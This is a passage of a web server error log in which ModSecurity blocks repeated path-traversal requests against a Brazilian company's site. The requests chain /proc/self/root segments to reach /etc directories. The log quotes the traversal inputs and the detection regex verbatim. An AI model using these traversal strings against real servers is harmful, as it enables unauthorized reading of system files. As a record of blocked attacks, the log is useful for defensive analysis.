"bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp_vOoXxyEfFpUF8f9LQQAAAUg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 07:34:41.228649 2026] [:error] [pid 15051:tid 140411599251200] [client 74.7.243.128:50418] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp_wSmAPhZkrhU8w4lKqwAAAJE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/var/run/initramfs/state/etc
[Wed Mar 18 07:34:46.966813 2026] [:error] [pid 17653:tid 140411624429312] [client 74.7.241.31:34300] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp_xsdf6f5d65gmYZSwiQAAAs4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:34:50.163141 2026] [:error] [pid 26799:tid 140411540502272] [client 74.7.243.128:55462] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp_yta6ubjKNq_cu4Z0lAAAA1g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 07:34:55.769830 2026] [:error] [pid 17653:tid 140411582465792] [client 74.7.241.31:37506] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp_z8df6f5d65gmYZSwngAAAtM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:34:58.314547 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.241.31:35672] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp_0da6ubjKNq_cu4Z0nQAAA04"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 07:35:11.271877 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.241.31:35686] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp_39a6ubjKNq_cu4Z0tQAAA1I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:36:51.900401 2026] [:error] [pid 19507:tid 140411590858496] [client 74.7.241.31:55084] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqAQ9Y0UrI5A3LftIx7MgAAAZI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 07:37:04.201002 2026] [:error] [pid 30077:tid 140411574073088] [client 74.7.243.128:33876] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqAUPu8EFLIOrSqIpvjNgAAAlQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 07:37:14.048556 2026] [:error] [pid 19507:tid 140411557287680] [client 74.7.243.128:51194] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqAWtY0UrI5A3LftIx7aAAAAZY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 07:37:29.812659 2026] [:error] [pid 17653:tid 140411624429312] [client 74.7.243.128:40484] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqAacdf6f5d65gmYZSxigAAAs4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:37:47.265557 2026] [:error] [pid 17887:tid 140411733534464] [client 74.7.243.128:48252] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqAewkwaGbbGflqUZDu5AAAAME"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:37:47.502995 2026] [:error] [pid 29882:tid 140411708356352] [client 74.7.228.61:58094] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqAe0zinOy1jxa1j4fwagAAAQQ"]
[Wed Mar 18 07:37:53.128379 2026] [:error] [pid 29882:tid 140411574073088] [client 74.7.244.43:55360] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqAgUzinOy1jxa1j4fwegAAARQ"]
[Wed Mar 18 07:38:28.222062 2026] [mime_magic:error] [pid 19507:tid 140411699963648] (70014)End of file found: [client 216.73.216.191:1911] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 07:38:28.781786 2026] [mime_magic:error] [pid 17887:tid 140411699963648] (70014)End of file found: [client 216.73.216.191:16594] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 07:38:31.521393 2026] [:error] [pid 19507:tid 140411658000128] [client 74.7.243.128:34196] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqAp9Y0UrI5A3LftIx79gAAAYo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 07:38:38.429869 2026] [mime_magic:error] [pid 30077:tid 140411599251200] (70014)End of file found: [client 57.141.18.96:60448] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 07:38:39.859053 2026] [mime_magic:error] [pid 19507:tid 140411666392832] (70014)End of file found: [client 57.141.18.121:60386] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 07:38:40.644275 2026] [:error] [pid 17653:tid 140411649607424] [client 74.7.243.128:52592] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqAsMdf6f5d65gmYZSx2gAAAss"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 07:38:46.691628 2026] [mime_magic:error] [pid 15051:tid 140411599251200] (70014)End of file found: [client 216.73.216.191:60886] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 07:40:01.336334 2026] [mime_magic:error] [pid 29882:tid 140411741927168] (70014)End of file found: [client 57.141.18.17:35850] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 07:40:07.565532 2026] [:error] [pid 31803:tid 140411632822016] [client 216.73.216.191:36400] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqBBuyqAr6etmhZHNqayQAAAE0"]
[Wed Mar 18 07:40:12.743021 2026] [:error] [pid 29882:tid 140411582465792] [client 216.73.216.191:36684] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqBDEzinOy1jxa1j4fw-wAAARM"]
[Wed Mar 18 07:40:16.294975 2026] [:error] [pid 15051:tid 140411582465792] [client 216.73.216.191:36798] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc4.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqBDymAPhZkrhU8w4lMSAAAAJM"]
[Wed Mar 18 07:40:23.145116 2026] [:error] [pid 15826:tid 140411691570944] [client 74.7.243.128:39744] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqBF-oXxyEfFpUF8f9M-wAAAUY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 07:40:32.294533 2026] [:error] [pid 15051:tid 140411699963648] [client 74.7.241.31:56202] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqBICmAPhZkrhU8w4lMWQAAAIU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 07:40:38.202633 2026] [:error] [pid 17887:tid 140411540502272] [client 74.7.243.128:45092] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqBJQkwaGbbGflqUZDvZwAAANg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:40:40.960132 2026] [:error] [pid 31803:tid 140411548894976] [client 74.7.243.128:55594] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqBKOyqAr6etmhZHNqa6gAAAFc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:40:41.135722 2026] [:error] [pid 29882:tid 140411599251200] [client 74.7.241.31:42758] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqBKUzinOy1jxa1j4fxEgAAARE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
